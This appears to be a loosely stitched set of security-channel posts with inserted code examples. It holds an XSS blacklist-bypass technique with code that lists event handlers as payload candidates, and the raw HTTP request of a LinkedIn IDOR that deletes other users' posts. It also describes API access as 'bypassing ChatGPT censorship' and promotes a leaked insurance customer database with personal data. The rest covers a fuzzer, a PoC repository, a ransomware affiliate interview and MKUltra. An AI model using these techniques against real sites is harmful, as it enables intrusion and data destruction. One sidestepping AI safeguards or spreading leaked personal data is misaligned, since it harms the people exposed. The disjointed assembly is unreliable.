https://www.perimeterx.com/tech-blog/2019/list-every-event-that-exists-in-the-browser/
Useful for exploiting XSS when the service blacklists specific event handlers.

The simplest way:

Object.getOwnPropertyNames(document).concat(Object.getOwnPropertyNames(Object.getPrototypeOf(Object.getPrototypeOf(document)))).filter(function(i){return !i.indexOf('on')&&(document[i]==null||typeof document[i]=='function');})

(`!i.indexOf('on')` is true only when indexOf returns 0, i.e. the name starts with "on"; unset handler attributes read as null, set ones as functions.)

Like this (also picks up the handlers on the window prototype and removes duplicates):

Object.getOwnPropertyNames(document).concat(Object.getOwnPropertyNames(Object.getPrototypeOf(Object.getPrototypeOf(document)))).concat(Object.getOwnPropertyNames(Object.getPrototypeOf(window))).filter(function(i){return !i.indexOf('on')&&(document[i]==null||typeof document[i]=='function');}).filter(function(elem, pos, self){return self.indexOf(elem) == pos;})

Or like this:

[...new Set([
  ...Object.getOwnPropertyNames(document),
  ...Object.getOwnPropertyNames(Object.getPrototypeOf(Object.getPrototypeOf(document))),
  ...Object.getOwnPropertyNames(Object.getPrototypeOf(window)),
].filter(k => k.startsWith("on") && (document[k] == null || typeof document[k] == "function")))];
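Added example, not code from the post or from the linked article: the same "on*" enumeration generalized to walk the whole prototype chain (so it also catches handlers defined further up, e.g. on EventTarget), followed by the step the post actually uses it for, dropping the names a server-side blacklist rejects. The blacklist and the fake document are constructed for the example; in a browser you would call listEventHandlers(document) or listEventHandlers(window) instead.

```javascript
// Added example: enumerate every "on*" handler reachable from an object by
// walking its entire prototype chain, then filter out blacklisted names.

function listEventHandlers(target) {
  const names = new Set();
  // Start at the object itself and climb until Object.prototype.
  for (let obj = target; obj && obj !== Object.prototype; obj = Object.getPrototypeOf(obj)) {
    for (const name of Object.getOwnPropertyNames(obj)) {
      if (!name.startsWith('on')) continue;
      // Unset handler attributes read as null, set ones as functions; anything
      // else starting with "on" (e.g. a string-valued property) is not a handler.
      const value = target[name];
      if (value == null || typeof value === 'function') names.add(name);
    }
  }
  return [...names].sort();
}

// Handler names a hypothetical blacklist/WAF rejects (constructed for the example).
const EXAMPLE_BLACKLIST = ['onerror', 'onload', 'onclick', 'onmouseover'];

// Handlers that survive the blacklist, i.e. candidates for an XSS payload.
function bypassCandidates(handlers, blacklist) {
  const blocked = new Set(blacklist.map(h => h.toLowerCase()));
  return handlers.filter(h => !blocked.has(h.toLowerCase()));
}

// Constructed stand-in for a browser document: handlers spread over two
// prototype levels, roughly like EventTarget.prototype / Document.prototype,
// plus a decoy property that starts with "on" but is not a handler.
function makeFakeDocument() {
  const eventTargetProto = Object.create(Object.prototype, {
    onabort: { value: null, writable: true },
    onerror: { value: null, writable: true },
  });
  const documentProto = Object.create(eventTargetProto, {
    onclick: { value: null, writable: true },
    onload: { value: null, writable: true },
    onanimationend: { value: null, writable: true },
    ontology: { value: 'decoy, not a handler' },
  });
  const doc = Object.create(documentProto);
  doc.onmouseover = function () {}; // a handler already assigned on the instance
  return doc;
}

function demo() {
  // Use the real document when run in a browser, the constructed one under Node.
  const target = typeof document !== 'undefined' ? document : makeFakeDocument();
  const all = listEventHandlers(target);
  const usable = bypassCandidates(all, EXAMPLE_BLACKLIST);
  console.log(`${all.length} handlers found, ${usable.length} not blacklisted:`, usable);
  return usable;
}

demo();
```

The two-level lookup in the post is exactly what a browser needs for document, but walking the chain means the same function works unchanged on window, on an element, or on any other object that carries handler attributes.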
Two weeks ago a vulnerability was disclosed that allowed deleting anyone else's post on LinkedIn.

POST /mwlite/feed/deletePost/?csrfToken=ajax:6083619284478736796 HTTP/1.1
Host: www.linkedin.com

{"objectUrn":"urn:li:activity:6390481093803499520"}

where objectUrn is the ID of someone else's post. The IDOR was valued at $10,000.
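Added example, not LinkedIn's code: a minimal model of a deletePost endpoint that shows why this is an IDOR and what the fix looks like. The store, sessions, cookie values and URNs are constructed for the example; the point is that the CSRF token check passes in both versions, so CSRF protection alone does nothing against a caller who is simply not the owner of the object.

```javascript
// Added example: vulnerable vs fixed deletePost handler (constructed data).

// Posts keyed by URN; each has an owner.
const POSTS = new Map([
  ['urn:li:activity:1001', { owner: 'alice', text: 'hello' }],
  ['urn:li:activity:1002', { owner: 'bob', text: 'world' }],
]);

// Sessions keyed by session cookie; the csrfToken is bound to the session.
const SESSIONS = new Map([
  ['cookie-alice', { user: 'alice', csrfToken: 'ajax:111' }],
  ['cookie-bob', { user: 'bob', csrfToken: 'ajax:222' }],
]);

function makeRequest(cookie, csrfToken, objectUrn) {
  return { cookie, query: { csrfToken }, body: JSON.stringify({ objectUrn }) };
}

// Shared by both handlers: who is calling, and does their CSRF token match?
function authenticate(req) {
  const session = SESSIONS.get(req.cookie);
  if (!session) return { status: 401, session: null };
  if (req.query.csrfToken !== session.csrfToken) return { status: 403, session: null };
  return { status: 200, session };
}

// Vulnerable: any logged-in user can delete any objectUrn they can name.
function deletePostVulnerable(req, store) {
  const { status, session } = authenticate(req);
  if (!session) return status;
  const { objectUrn } = JSON.parse(req.body);
  if (!store.has(objectUrn)) return 404;
  store.delete(objectUrn); // no ownership check
  return 200;
}

// Fixed: load the object and compare its owner with the authenticated user.
function deletePostFixed(req, store) {
  const { status, session } = authenticate(req);
  if (!session) return status;
  const { objectUrn } = JSON.parse(req.body);
  const post = store.get(objectUrn);
  if (!post) return 404;
  // Returning 404 here instead of 403 would also avoid confirming that the
  // object exists; either way the delete must not happen.
  if (post.owner !== session.user) return 403;
  store.delete(objectUrn);
  return 200;
}

// Demo: bob, with a valid session and CSRF token, tries to delete alice's post.
function demo() {
  const vulnStore = new Map(POSTS);
  const fixedStore = new Map(POSTS);
  const attack = makeRequest('cookie-bob', 'ajax:222', 'urn:li:activity:1001');
  const result = {
    vulnerable: { status: deletePostVulnerable(attack, vulnStore), alicePostSurvives: vulnStore.has('urn:li:activity:1001') },
    fixed: { status: deletePostFixed(attack, fixedStore), alicePostSurvives: fixedStore.has('urn:li:activity:1001') },
  };
  console.log(result);
  return result;
}

demo();
```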
https://github.com/quarkslab/pastis
The PASTIS project is a fuzzing framework aiming at combining various software testing techniques within the same workflow to perform collaborative fuzzing also called ensemble fuzzing. At the moment it supports the following fuzzing engines:
— Honggfuzz (greybox fuzzer)
— AFL++ (greybox fuzzer)
— TritonDSE (whitebox fuzzer)
chatgpt-for-bugbounty-.pdf
Catching up.

Bypassing ChatGPT censorship with direct requests to the API.

1. Install jq
2. Put your key into the CHATGPT_TOKEN environment variable, taken from https://platform.openai.com/account/api-keys
3. Use it
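Added example, not the channel's script: the same idea (talk to the model through the API instead of the web UI, reading the key from CHATGPT_TOKEN) done with Node's built-in fetch rather than curl + jq. The endpoint, headers and response shape are those of the chat completions API; the model name and the system prompt are assumptions, and the request builder and response parser are separate functions so they can be checked without network access.

```javascript
// Added example: query the chat completions API with the key from CHATGPT_TOKEN.

const API_URL = 'https://api.openai.com/v1/chat/completions';

// Build the request curl would send (model and system prompt are assumptions).
function buildChatRequest(token, userPrompt, model = 'gpt-3.5-turbo') {
  if (!token) throw new Error('CHATGPT_TOKEN is not set');
  return {
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      Authorization: `Bearer ${token}`,
    },
    body: JSON.stringify({
      model,
      messages: [
        { role: 'system', content: 'You are an assistant for authorized penetration testing.' },
        { role: 'user', content: userPrompt },
      ],
    }),
  };
}

// The jq step (.choices[0].message.content), with the API's error object
// surfaced instead of a confusing "undefined".
function extractReply(responseJson) {
  const choice = responseJson && responseJson.choices && responseJson.choices[0];
  if (!choice || !choice.message || typeof choice.message.content !== 'string') {
    const msg = responseJson && responseJson.error ? responseJson.error.message : 'unexpected response shape';
    throw new Error(`API error: ${msg}`);
  }
  return choice.message.content.trim();
}

async function ask(prompt) {
  const res = await fetch(API_URL, buildChatRequest(process.env.CHATGPT_TOKEN, prompt));
  return extractReply(await res.json());
}

// Only touch the network when a token is actually present in the environment.
if (typeof process !== 'undefined' && process.env.CHATGPT_TOKEN) {
  const prompt = process.argv.slice(2).join(' ') || 'Explain what an IDOR is in two sentences.';
  ask(prompt).then(console.log, e => { console.error(e.message); process.exit(1); });
}
```

Usage: `CHATGPT_TOKEN=sk-... node ask.js "your question"`. The key stays in the environment and never lands in the command line or shell history.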
A repository with a huge list of PoCs for many CVEs, going back to 2008: https://github.com/nomi-sec/PoC-in-GitHub.
It is auto-populated and has a separate site at https://poc-in-github.motikan2010.net/. The repository's own description warns that collected PoCs may contain malware, so run them only in an isolated environment.
A leaked customer database of AlfaStrakhovanie. Notable because it contains many corporate accounts of employees from Magnit, X5, Sber and other "top" companies. In total the leak has over 1 million rows with full names, phone numbers, e-mails and password hashes.
A recent interview with Bassterlord (former affiliate of REvil, Avaddon and LockBit) by The Record: https://therecord.media/bassterlord-interview-hacker-initial-access-broker. He shares details about his personal life, leaving hacking, and his plans for the future.
In a sense, this book is the result of two historical accidents. The first “accident” is that of the thousands of pages of research conducted under the CIA’s decade-long MKULTRA program, to our knowledge, only two major research studies — Mulholland’s manuals — survived CIA Director Richard Helm’s order in 1973 to destroy all MKULTRA documents. Mulholland’s manuals are a rare piece of historical evidence that the CIA, in the 1950s, through MKULTRA, sought to understand and acquire unorthodox capabilities for potential use against the Soviet adversary and the worldwide Communist threat. The manuals and other declassified MKULTRA administrative materials further reveal that many of America’s leading scientists and private institutions willingly participated in secret programs they agreed were critical to the nation’s security.
The second “accident” was the authors’ discovery of the long-lost CIA manuals while conducting unrelated research in 2007. Although portions of the manuals had been previously described, referenced, or printed in part, we were unaware of the existence of a copy of the complete declassified work along with the original drawings and illustrations.
Project MKUltra was an illegal human experimentation program designed and undertaken by the U.S. Central Intelligence Agency, intended to develop procedures and identify drugs that could be used in interrogations to weaken individuals and force confessions through brainwashing and psychological torture. It began in 1953 and was halted in 1973. MKUltra used numerous methods to manipulate its subjects' mental states and brain functions, such as the covert administration of high doses of psychoactive drugs (especially LSD) and other chemicals without the subjects' consent, electroshocks, hypnosis, sensory deprivation, isolation, verbal and sexual abuse, and other forms of torture.